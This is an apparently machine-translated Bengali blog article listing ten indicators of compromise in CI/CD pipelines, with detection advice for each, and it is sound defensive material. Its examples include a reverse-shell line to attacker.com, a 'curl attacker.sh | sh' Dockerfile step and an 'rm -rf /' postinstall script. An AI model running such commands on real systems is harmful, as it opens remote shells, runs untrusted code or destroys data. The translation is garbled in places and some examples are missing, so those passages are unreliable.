ভূমিকা: সাইবার নিরাপত্তায় নিরাপত্তা লঙ্ঘনের সূচকগুলো কী কী?
আপসের সূচকগুলি হল প্রথম সতর্ক সংকেত যা আপনার সিস্টেম বা pipeline আক্রমণের শিকার হতে পারে। সহজ কথায়, সমঝোতার সূচক আক্রমণকারীদের রেখে যাওয়া চিহ্ন, যেমন অদ্ভুত logins, ফাইলের পরিবর্তন, বা লুকানো ম্যালওয়্যার। আইওসি সাইবার নিরাপত্তাএগুলো অপরাধস্থলের আঙুলের ছাপের মতো কাজ করে, যা আপনাকে স্পষ্ট প্রমাণ দেয় যে কিছু একটা ভুল হয়েছে। তাই, যখন ডেভেলপাররা জিজ্ঞাসা করে আপোসের সূচকগুলো কী কী?এর উত্তর শুধু সার্ভার বা ফায়ারওয়ালের মধ্যেই সীমাবদ্ধ নয়, বরং আধুনিক ব্যবস্থায় লুকিয়ে থাকা ঝুঁকিগুলোও এর অন্তর্ভুক্ত। CI/CD pipelines.
এই মধ্যে pipelineএর মাধ্যমে, আক্রমণকারীরা অলক্ষ্যে কোডে হস্তক্ষেপ করতে, ক্ষতিকর ডিপেন্ডেন্সি প্রবেশ করাতে, বা বিল্ড স্টেপ পরিবর্তন করতে পারে। তবে, বেশিরভাগ গাইড এখনও কেবল সার্ভার বা নেটওয়ার্কের উপরই আলোকপাত করে। ফলে, সফটওয়্যার সাপ্লাই চেইন সবচেয়ে সহজ লক্ষ্যবস্তুগুলোর একটিতে পরিণত হয়েছে।
এই কারণেই আপোসের সূচকগুলি খুঁজে বের করা CI/CD pipelineএটি অপরিহার্য। সর্বোপরি, এটি টিমগুলোকে ম্যালওয়্যার ব্লক করতে, গোপনীয় তথ্য রক্ষা করতে এবং সফটওয়্যার ডেলিভারির প্রতিটি ধাপ সুরক্ষিত করতে সাহায্য করে।
আপোসের শীর্ষ ১০টি সূচক CI/CD Pipelines
আপসের সূচক ব্যাখ্যা করার সময়, বেশিরভাগ তালিকা সার্ভার বা নেটওয়ার্কের উপর আলোকপাত করে। তবুও CI/CD pipelineআক্রমণকারীরা একেকজন একেক রকম চিহ্ন রেখে যায়। সক্রিয় প্রতিরক্ষার জন্য এই সংকেতগুলো শনাক্ত করা অত্যন্ত গুরুত্বপূর্ণ। নিচে আইওসি সাইবারসিকিউরিটির ১০টি রেড ফ্ল্যাগ দেওয়া হলো, যেগুলোর প্রতি প্রত্যেক ডেভেলপার এবং সিকিউরিটি ইঞ্জিনিয়ারের নজর রাখা উচিত।
১. সন্দেহজনক নির্ভরশীলতার পরিবর্তন
আপোসের অন্যতম প্রধান সূচক pipelineএটি একটি আকস্মিক, অস্বাভাবিক ডিপেন্ডেন্সি আপডেট। আক্রমণকারীরা প্রায়শই প্যাকেজ ম্যানেজারদের উপর ডেভেলপারদের রাখা বিশ্বাসকে কাজে লাগিয়ে বিপজ্জনক প্যাকেজ যুক্ত করে।
উদাহরণস্বরূপ npm-এ package.json ডিফের মধ্যে হঠাৎ অন্তর্ভুক্ত থাকতে পারে:
এই ধরনের পরিবর্তন নিরাপদ মনে হলেও, তা প্রতিটি বিল্ডে ট্রোজানযুক্ত কোড প্রবেশ করিয়ে দিতে পারে।
প্রভাবঃ ত্রুটিপূর্ণ বিল্ডগুলো উৎস থেকেই ম্যালওয়্যার পেয়ে থাকে।
ডিটেকশন: ডিপেন্ডেন্সি রিভিউ বাধ্যতামূলক করুন, লকফাইল ডিফস ট্র্যাক করুন এবং সব সময় নতুন প্যাকেজ স্ক্যান করুন।
২. বিল্ডে দুর্বোধ্য কোড
ম্যালওয়্যার নির্মাতারা পর্যালোচনা এড়ানোর জন্য তথ্য গোপনের কৌশল ব্যবহার করে। ফলে, এই ঝুঁকির সূচকটি... CI/CD pipelineএগুলো শনাক্ত করা সবচেয়ে কঠিন কাজগুলোর মধ্যে একটি হতে পারে। প্রকৃতপক্ষে, দুর্বোধ্য পেলোডগুলো প্রায়শই অলক্ষ্যে ওপেন সোর্স লাইব্রেরি বা কন্টেইনার ইমেজে ঢুকে পড়ে।
উদাহরণ স্বরূপ:
- একটি পাইপিআই প্যাকেজ ব্যবহার করে
base64.b64decode("cHJpbnQoSGFja2VkKQ=="). - একটি ডকার ইমেজ, যাতে অপ্রয়োজনীয় UPX বাইনারিগুলো প্যাক করা আছে।
- জাভাস্ক্রিপ্ট পূর্ণ
\x41\x42পরিচয়পত্র চোরদের থেকে লুকিয়ে থাকা অবস্থায় রক্ষা পায়।
প্রভাবঃ লুকানো কোড বিল্ড বা রানটাইম চলাকালীন নীরবে কার্যকর হয়, যা আইওসি সাইবারসিকিউরিটির ক্ষেত্রে এটিকে একটি অত্যন্ত গুরুত্বপূর্ণ সংকেত করে তোলে।
ডিটেকশন: মেশা SAST ম্যালওয়্যার স্ক্যানিংয়ের মাধ্যমে এনকোডেড বা প্যাকড কোড চিহ্নিত করুন। সর্বোপরি, দুর্বোধ্যতাকে একটি বিপদ সংকেত হিসেবে বিবেচনা করুন, যা আরও তদন্তের দাবি রাখে।
৩. গিট-এ গোপন তথ্য ফাঁস: আইওসি-এর একটি চিরায়ত সাইবার নিরাপত্তা ঝুঁকি
CI/CD pipelineপ্রায়শই রিপোজিটরি থেকে সরাসরি গোপনীয় তথ্য উত্তরাধিকার সূত্রে পায়। তবে, যখন গিট-এ গোপনীয় তথ্য প্রকাশ পায়, এগুলো “আপোষের সূচকগুলো কী” এই প্রশ্নের অন্যতম স্পষ্ট উত্তর হয়ে ওঠে। pipelineএকবার ক্রেডেনশিয়ালগুলো গিট-এ চলে এলে, আক্রমণকারীরা অনির্দিষ্টকালের জন্য সেগুলোর অপব্যবহার করতে পারে।
উদাহরণ স্বরূপ:
- A
.envফাইল ধারণকারীAWS_SECRET_KEY=. - টোকেনগুলি ঠেলে দেওয়া হয়েছে
config.json. - মুছে ফেলার পরেও গিট হিস্ট্রিতে গোপনীয় তথ্য দেখা যাচ্ছে।
প্রভাবঃ উন্মুক্ত কীগুলো আক্রমণকারীদের সরাসরি অ্যাক্সেস দেয় CI/CD pipelineক্লাউড সিস্টেম বা ডেটাবেস। সুতরাং, এটি নিরাপত্তা লঙ্ঘনের অন্যতম বিপজ্জনক সূচক।
ডিটেকশন: ব্যবহার pre-commit hooks এবং গোপনীয় তথ্য স্ক্যান করার জন্য সিআই (CI) জব চালান, এবং ফাঁস হওয়া কীগুলো অবিলম্বে বাতিল করুন। এছাড়াও, ঝুঁকির সময়কাল কমাতে স্বয়ংক্রিয় প্রতিকার ব্যবস্থা প্রয়োগ করুন।
৪. বিকৃত Pipeline কনফিগারেশন: আপোসের গোপন সূচক
Pipeline কনফিগারেশনগুলো উচ্চ-মূল্যের লক্ষ্যবস্তু, কারণ একটি মাত্র পরিবর্তন প্রায়শই পুরো কার্যপ্রবাহকে ব্যাহত করে।ফলস্বরূপ, বিকৃত করা হয়েছে pipeline ফাইলগুলো আইওসি-এর একটি বড় সাইবার নিরাপত্তা ঝুঁকি, যা প্রচলিত পর্যবেক্ষণ সরঞ্জামগুলো খুব কমই শনাক্ত করে।
উদাহরণ স্বরূপ:
গিটহাব অ্যাকশনস-এ:
- গিটল্যাবে: একটি ক্ষতিকর জব যোগ করা হয়েছে
.gitlab-ci.ymlযা সংবেদনশীল তথ্য ফাঁস করে দেয়। - জেনকিন্সে:
sh "nc -e /bin/bash attacker.com 4444".
প্রভাবঃ এই অননুমোদিত পরিবর্তনগুলি আপনার pipeline আক্রমণকারীদের জন্য এটি একটি স্থায়ী ব্যাকডোরে পরিণত হয়, যা স্পষ্টতই নিরাপত্তা লঙ্ঘনের একটি সূচক হিসেবে গণ্য হয়।
ডিটেকশন: স্বাক্ষরিত কনফিগারেশন বাধ্যতামূলক করুন, পিআর অনুমোদন আবশ্যক করুন, এবং অপ্রত্যাশিত জবগুলোর উপর নজর রাখুন। এছাড়াও, সেট করুন guardrails যেগুলো স্বয়ংক্রিয়ভাবে পরিবর্তিত ওয়ার্কফ্লো ব্লক করে।
5. বিশেষাধিকারপ্রাপ্ত IaC ডিফল্টে
ত্রুটিপূর্ণভাবে কনফিগার করা পরিকাঠামো সংজ্ঞা প্রায়শই লুকানো ব্যাকডোর তৈরি করে। ফলস্বরূপ, বিশেষাধিকারপ্রাপ্ত ডিফল্টগুলি IaC এগুলো আইওসি-এর একটি চিরায়ত সাইবার নিরাপত্তা ঝুঁকি।
উদাহরণ স্বরূপ:
- একটি কুবারনেটিস ডিপ্লয়মেন্ট যা পডগুলিকে মঞ্জুর করে
privileged: true. - হেলম চার্টগুলি পরিষেবাগুলি প্রকাশ করে
0.0.0.0:22.
প্রভাবঃ আক্রমণকারীরা রুট-লেভেল অ্যাক্সেস লাভ করে অথবা অভ্যন্তরীণ পরিষেবাগুলোকে সর্বজনীনভাবে প্রকাশ করে দেয়। ফলস্বরূপ, এই বিষয়গুলো আক্রমণের ক্ষেত্রকে উল্লেখযোগ্যভাবে প্রসারিত করে।
ডিটেকশন: প্রয়োগ করা IaC মার্জ করার আগে সর্বনিম্ন বিশেষাধিকার নিশ্চিত করতে স্ক্যান করুন। এছাড়াও, নিশ্চিত করুন যে প্রতিটি কনফিগারেশন এর অংশ হিসাবে পর্যালোচনা করা হয়েছে। pipeline.
৬. অস্বাভাবিক নির্মাণ আচরণ
আক্রমণকারীরা প্রায়শই পরিবর্তন করে pipeline ক্ষতিকর কর্মকাণ্ডে জড়িয়ে পড়ার আচরণ। অন্য কথায়, সিস্টেমে আপোসের সূচক কী—এই প্রশ্নের অন্যতম স্পষ্ট উত্তর হলো অস্বাভাবিক বিল্ড অ্যাক্টিভিটি। CI/CD pipelines.
উদাহরণ স্বরূপ:
- বিল্ডগুলো অপরিচিত ডোমেইনে বহির্গামী নেটওয়ার্ক অনুরোধ পাঠাচ্ছে।
- একটি Node.js প্রজেক্ট চলাকালীন হঠাৎ করে PowerShell চালু হয়ে যাচ্ছে
npm install. - একটি CI জব বিল্ড স্ক্রিপ্টে সংজ্ঞায়িত নয় এমন বড় আকারের বাইনারি ডাউনলোড করছে।
প্রভাবঃ ত্রুটিপূর্ণ বিল্ডগুলো ম্যালওয়্যার বিতরণের কেন্দ্র হিসেবে কাজ করতে পারে। সর্বোপরি, এগুলো প্রতিটি ডেপ্লয়মেন্ট জুড়ে ক্ষতিকর পেলোড ছড়িয়ে দেয়।
ডিটেকশন: অপ্রত্যাশিত প্রসেস বা সংযোগের জন্য বিল্ড লগ নিরীক্ষণ করুন। এছাড়াও, স্বাভাবিকের বাইরের আচরণ চিহ্নিত করতে অ্যানোমালি ডিটেকশন কনফিগার করুন।
৭. আইওসি সাইবার নিরাপত্তা ঝুঁকি হিসেবে ক্ষতিকারক প্যাকেজ স্ক্রিপ্ট
প্যাকেজ ম্যানেজাররা জীবনচক্র সমর্থন করে hooks যা আক্রমণকারীরা কাজে লাগায়। তাই, npm, PyPI, বা Dockerfiles-এ থাকা ক্ষতিকারক স্ক্রিপ্টগুলো নিরাপত্তা লঙ্ঘনের একটি শক্তিশালী সূচক।
উদাহরণ স্বরূপ:
- npm:
postinstallস্ক্রিপ্ট চলছেrm -rf /অথবা একটি C2-তে বিকনিং করা। - পাইপিআই:
setup.pyইনস্টলের সময় লুকানো পাইথন কোড চালানো হচ্ছে। - ডকারফাইল:
RUN curl attacker.sh | sh.
প্রভাবঃ এই আক্রমণটি ইনস্টলেশনের সময়, কোনো রানটাইম টেস্টিং ছাড়াই সংঘটিত হয়। ফলে, ডেভেলপাররা হয়তো অনেক দেরি হয়ে যাওয়ার আগে বিষয়টি খেয়ালই করেন না।
ডিটেকশন: ইনস্টল স্ক্রিপ্টের জন্য প্যাকেজ ম্যানিফেস্ট স্ক্যান করুন। এছাড়াও, ঝুঁকিপূর্ণ বিষয়গুলো সীমাবদ্ধ করুন। hooks in CI/CD ঝুঁকি কমানোর কাজ।
৮. রেজিস্ট্রি বিষক্রিয়ার আপোসের সূচক
আক্রমণকারীরা রেজিস্ট্রিগুলোতে থাকা আর্টিফ্যাক্টগুলো প্রতিস্থাপন বা পরিবর্তন করে, এবং এই ঘটনাগুলো সাপ্লাই চেইনে নিরাপত্তা লঙ্ঘনের সূচক হিসেবে আদর্শ উদাহরণ। pipelines.
উদাহরণ স্বরূপ:
- একটি ট্রোজানযুক্ত লেয়ার দিয়ে নীরবে আপডেট করা একটি ডকার ইমেজ ট্যাগ।
- একটি অভ্যন্তরীণ প্যাকেজকে একটি ক্ষতিকর সংস্করণ দিয়ে প্রতিস্থাপন করা হয়েছে।
- এনপিএম নেমস্পেস স্কোয়াটিং, যেমন
lodash-proxy.
প্রভাবঃ রেজিস্ট্রি আর্টিফ্যাক্ট ব্যবহার করে তৈরি প্রতিটি বিল্ডই ঝুঁকিপূর্ণ হয়ে পড়ে। শুধু তাই নয়, এই ঝুঁকি পরবর্তী পরিষেবাগুলোতেও ছড়িয়ে পড়ে।
ডিটেকশন: সমস্ত রেজিস্ট্রি পুল করার সময় সিগনেচার এবং ইন্টিগ্রিটি চেক বাধ্যতামূলক করুন। এছাড়াও, আর্টিফ্যাক্টের উৎস ট্র্যাক করুন। SBOM বৈধতা
৯. আইওসি প্রমাণ হিসেবে অস্বাভাবিক ব্যবহারকারী কার্যকলাপ
হ্যাক হওয়া অ্যাকাউন্টগুলো প্রায় সবসময়ই অস্বাভাবিক চিহ্ন রেখে যায়। সেই অনুযায়ী, ডেভেলপারদের অস্বাভাবিক আচরণ কোনো আপসের একটি জোরালো ইঙ্গিত।
উদাহরণ স্বরূপ:
- Commitস্থানীয় সময় ভোর ৩টায় এটি প্রকাশ করা হয়েছে।
- ছুটিতে থাকা অ্যাকাউন্টস দ্বারা পিআর অনুমোদন।
- Pipelineঅস্বাভাবিক ঘন ঘন সক্রিয় হচ্ছে।
প্রভাবঃ আক্রমণকারীরা ক্ষতিকারক পরিবর্তন প্রবেশ করানোর জন্য চুরি করা ক্রেডেনশিয়াল অপব্যবহার করে। সর্বোপরি, অননুমোদিত commitএগুলো সাধারণ কর্মপ্রবাহের সাথে সহজেই মিশে যায়।
ডিটেকশন: মনিটর SCM অস্বাভাবিকতার জন্য কার্যকলাপ শনাক্ত করুন, এমএফএ (MFA) প্রয়োগ করুন এবং নিয়মিত টোকেন পরিবর্তন করুন। এছাড়াও, সন্দেহজনক কার্যকলাপের বিষয়ে সতর্ক করুন। commit অথবা অনুমোদনের ধরণ।
১০. আইওসি সাইবারসিকিউরিটিতে ইন্টিগ্রিটি বা সিগনেচার চেকের ব্যর্থতা
একটি সাধারণ কিন্তু উপেক্ষিত আপোসের সূচক এটি একটি ব্যর্থ ইন্টিগ্রিটি বা সিগনেচার চেক। আইওসি সাইবারসিকিউরিটিতে, এই চেকগুলো কোড বা আর্টিফ্যাক্টগুলোর সত্যতা যাচাই করে। এগুলো এড়িয়ে গেলে... pipelineউন্মোচিত হয়েছে।
উদাহরণ:
- একটি SHA256 হ্যাশ যা প্রত্যাশিত চেক্সামের সাথে মেলে না।
- একটি অনুপস্থিত বা অবৈধ GPG স্বাক্ষর।
- An SBOM স্বাক্ষরবিহীন নিদর্শন দেখানো হচ্ছে।
প্রভাবঃ অখণ্ডতার ব্যর্থতার কারণে প্রায়শই ডেটা টেম্পারিং, রেজিস্ট্রি পয়জনিং বা ম্যালওয়্যার প্রবেশ করানো হয়।
ডিটেকশন: স্বাক্ষর যাচাই স্বয়ংক্রিয় করুন, চেকসাম যাচাইকরণ বাধ্যতামূলক করুন এবং স্বাক্ষরবিহীন উপাদান ব্লক করুন। সর্বোপরি, প্রতিটি ব্যর্থ যাচাইকে নিরাপত্তা লঙ্ঘনের সুস্পষ্ট প্রমাণ হিসেবে বিবেচনা করুন।
CI/CD এক নজরে আপোসের সূচকসমূহ
| আপোসের সূচক (IOC) | প্রভাব CI/CD Pipelines | কিভাবে সনাক্ত করতে হয় |
|---|---|---|
| সন্দেহজনক নির্ভরশীলতার পরিবর্তন | আক্রমণকারীরা প্যাকেজ ম্যানেজারগুলিতে ক্ষতিকারক লাইব্রেরি প্রবেশ করিয়ে দেয়, যার ফলে বিল্ডগুলি ত্রুটিপূর্ণ হয়ে পড়ে। | লকফাইলের পার্থক্যগুলো ট্র্যাক করুন, নির্ভরতা পর্যালোচনা বাধ্যতামূলক করুন এবং ক্রমাগত নির্ভরতাগুলো স্ক্যান করুন। |
| বিল্ডে অস্পষ্ট কোড | লুকানো পেলোডগুলো বিল্ড বা রানটাইম চলাকালীন অলক্ষ্যে কার্যকর হয়। | ব্যবহার SAST এবং বেস৬৪, হেক্স বা প্যাকড কোড প্যাটার্ন চিহ্নিত করার জন্য ম্যালওয়্যার স্ক্যানিং। |
| গিট-এ গোপন তথ্য ফাঁস | ফাঁস হওয়া টোকেন বা এপিআই কী আক্রমণকারীদের গুরুত্বপূর্ণ সিস্টেমে সরাসরি প্রবেশাধিকার দেয়। | গিট-এ গোপন স্ক্যান চালান hooks এবং ফাঁস হওয়া ক্রেডেনশিয়ালগুলো স্বয়ংক্রিয়ভাবে বাতিল করুন। |
| টেম্পারড Pipeline কনফিগারেশন | পরিবর্তিত ওয়ার্কফ্লো ভিতরে ডেটা এক্সফিলট্রেশন বা পার্সিস্টেন্সের অনুমতি দেয় CI/CD. | পিআর অনুমোদন আবশ্যক করুন, স্বাক্ষরিত কনফিগারেশন কার্যকর করুন এবং নিরীক্ষণ করুন। pipeline পরিবর্তন। |
| প্রিভিলেজড IaC ডিফল্টে | অতিরিক্ত শিথিল ভূমিকা বা অনিরাপদ ডিফল্ট ব্যবস্থা ক্লাউড পরিবেশকে ঝুঁকিপূর্ণ করে তোলে। | ন্যূনতম বিশেষাধিকার প্রয়োগের জন্য Terraform, Kubernetes, এবং Helm ফাইলগুলি স্ক্যান করুন। |
| অস্বাভাবিক নির্মাণ আচরণ | Pipelineম্যালওয়্যার বিতরণের কেন্দ্র হিসেবে অথবা পার্শ্বীয় স্থানান্তরের জন্য ব্যবহৃত হয়। | অপ্রত্যাশিত ডাউনলোড, প্রসেস বা আউটবাউন্ড কলের জন্য বিল্ড লগ বিশ্লেষণ করুন। |
| ক্ষতিকারক প্যাকেজ স্ক্রিপ্ট | লুকানো প্রি/পোস্ট-ইনস্টল স্ক্রিপ্টগুলো রানটাইম টেস্টিংয়ের আগে পেলোডগুলোকে ট্রিগার করে। | ঝুঁকিপূর্ণ npm/PyPI স্ক্রিপ্ট ব্লক করুন এবং এর এক্সিকিউশন সীমাবদ্ধ করুন CI/CD কাজ। |
| রেজিস্ট্রি বিষক্রিয়া | ট্রোজানযুক্ত আর্টিফ্যাক্টগুলো রেজিস্ট্রিগুলোতে থাকা বিশ্বস্ত ইমেজ বা বাইনারিগুলোকে প্রতিস্থাপন করে। | চেকসাম যাচাই করুন, স্বাক্ষর যাচাইকরণ বাধ্যতামূলক করুন এবং সক্রিয়ভাবে রেজিস্ট্রি স্ক্যান করুন। |
| অস্বাভাবিক ব্যবহারকারীর কার্যকলাপ | হ্যাক হওয়া অ্যাকাউন্টগুলো ক্ষতিকর তথ্য ছড়ায়। commits বা ট্রিগার pipelines. | এমএফএ প্রয়োগ করুন, পর্যবেক্ষণ করুন commitঅসঙ্গতিগুলির জন্য, এবং বিশ্লেষণ করুন login নিদর্শন। |
| অখণ্ডতা বা স্বাক্ষর যাচাইয়ে ব্যর্থতা | বিকৃত কোড, নির্ভরতা বা ছবি প্রবেশ করার ইঙ্গিত দেয়। pipeline. | অখণ্ডতা যাচাই স্বয়ংক্রিয় করুন এবং স্বাক্ষরবিহীন বা অমিল উপাদানগুলো ব্লক করুন। |
কেন ঐতিহ্যবাহী আইওসি সাইবার নিরাপত্তা ব্যর্থ হয় CI/CD ঝুঁকি
বেশিরভাগ সংস্থাই ইতোমধ্যে সার্ভার, কম্পিউটার বা নেটওয়ার্কে নিরাপত্তা লঙ্ঘনের সূচকগুলো পর্যবেক্ষণ করে। তবে, আইওসি সাইবারসিকিউরিটির এই চিরাচরিত পদ্ধতিটি উপেক্ষা করে... CI/CD pipelines, যা এখন সবচেয়ে গুরুত্বপূর্ণ আক্রমণের ক্ষেত্রগুলোর মধ্যে অন্যতম। প্রকৃতপক্ষে, pipelines এমন স্বতন্ত্র আপোসের সংকেত দেখায় যা প্রচলিত সরঞ্জাম দিয়ে শনাক্ত করা যায় না।
ঐতিহ্যগত নিরাপত্তায় আপোসের সূচক
প্রচলিত আইওসি সাইবারসিকিউরিটিতে সাধারণত নিম্নলিখিত বিষয়গুলোর ওপর আলোকপাত করা হয়:
- অস্বাভাবিক loginআইপি অ্যাড্রেস বা আইডি যা চুরি হওয়া ক্রেডেনশিয়ালের ইঙ্গিত দেয়।
- সন্দেহজনক ফাইল হ্যাশ বা রেজিস্ট্রি পরিবর্তন যা ম্যালওয়্যারের উপস্থিতি প্রকাশ করে।
- অপ্রত্যাশিত বহির্গামী ট্র্যাফিক যা ডেটা পাচারের ইঙ্গিত দেয়।
এগুলো সুপরিচিত সূচক যা ট্র্যাক করা হয় MITRE ATT&CK ফ্রেমওয়ার্কযা প্রতিপক্ষের সাধারণ আচরণ এবং কৌশলগুলোকে চিহ্নিত করে। এগুলো দরকারি সংকেত। তবে, এগুলো মূলত অপারেটিং সিস্টেম বা কর্পোরেট নেটওয়ার্কের ক্ষেত্রেই প্রযোজ্য। ফলে, সফটওয়্যার সরবরাহ শৃঙ্খলের আরও আগের পর্যায়ে ঘটে যাওয়া সূক্ষ্ম কারসাজিগুলো এর আওতার বাইরে থেকে যায়।
কেন CI/CD Pipelineগুলি ভিন্ন
CI/CD pipelineস্বয়ংক্রিয় পরিবেশ যেখানে ডেভেলপাররা commit কোড, পুল ডিপেন্ডেন্সি এবং রিলিজ বিল্ড। আক্রমণকারীরা জানে যে এখানে একটি ত্রুটি ঘটলে তা প্রতিটি ডেপ্লয়মেন্ট জুড়ে ছড়িয়ে পড়ে। তদনুসারে, ত্রুটির সূচকগুলো কী কী? CI/CD pipelines? এগুলো দেখতে খুব আলাদা:
- package.json বা requirements.txt-এ গোপনে একটি ক্ষতিকর ডিপেন্ডেন্সি যোগ করা হয়েছে।
- গিট-এ প্রকাশিত এপিআই কী বা টোকেন commits অথবা .env ফাইল।
- npm বা PyPI প্যাকেজে দুর্বোধ্য কোড প্রবেশ করানো হয়েছে।
- Terraform বা Kubernetes ফাইলগুলিতে privileged: true-এর মতো অনিরাপদ ডিফল্ট ব্যবহার করা।
- Pipeline ডেটা পাচার করতে বা ব্যাকডোর খুলতে কাজগুলো সম্পাদনা করা হয়েছে।
এই আপোসের সংকেতগুলো CI/CD অদৃশ্য থাকা standard নিরাপত্তা সরঞ্জাম।
আইওসি সাইবার নিরাপত্তায় ব্যবধান
যদিও অনেক দল কম্প্রোমাইজের সূচকগুলোর গুরুত্ব বোঝে, তবুও তারা কেবল সার্ভার এবং নেটওয়ার্ক লগ থেকে শনাক্তকরণের উপরই নির্ভর করে। ফলে, আক্রমণকারীরা স্বাভাবিক কোনো চিহ্ন না রেখেই বিল্ডকে বিষাক্ত করতে বা ম্যালওয়্যার প্রবেশ করাতে পারে। এ কারণেই XZ Utils ব্যাকডোর বা ক্ষতিকারক npm প্যাকেজের মতো ঘটনাগুলো প্রোডাকশনে পৌঁছানোর আগে পর্যন্ত অলক্ষিত থেকে গিয়েছিল।
এই ধরনের সরবরাহ শৃঙ্খলের আপসগুলো দ্বারাও তুলে ধরা হয় CISএ-এর সরবরাহ শৃঙ্খল নিরাপত্তা নির্দেশিকাযা সতর্ক করে যে আক্রমণকারীরা ক্রমবর্ধমানভাবে লক্ষ্যবস্তু করছে CI/CD pipelineসমূহ এবং রেজিস্ট্রিসমূহ।
Takeaway
প্রচলিত আইওসি সাইবার নিরাপত্তা প্রয়োজনীয়, কিন্তু যথেষ্ট নয়। সর্বোপরি, দলগুলোকে অবশ্যই নির্দিষ্ট লঙ্ঘনের সূচকগুলো শনাক্ত করতে হবে। CI/CD pipelineকেবল তখনই তারা ক্ষতিকারক কোড শনাক্ত করতে পারে অথবা pipeline পরিবেশে ছড়িয়ে পড়ার আগেই এর অপব্যবহার রোধ করুন।





